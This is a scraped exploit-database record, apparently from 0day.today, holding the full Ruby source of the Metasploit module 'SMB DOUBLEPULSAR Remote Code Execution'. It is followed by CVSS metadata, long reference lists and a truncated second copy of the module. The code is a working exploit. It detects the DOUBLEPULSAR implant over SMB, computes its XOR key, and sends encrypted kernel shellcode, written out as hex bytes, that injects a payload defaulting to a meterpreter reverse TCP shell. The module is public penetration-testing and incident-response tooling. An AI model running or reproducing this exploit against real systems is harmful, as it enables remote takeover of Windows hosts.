https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:19:12", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "38e5964e1e3e711d1e698321e4fc8420", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T22:27:09", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", 
"EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-15T22:27:09", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-15T22:27:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
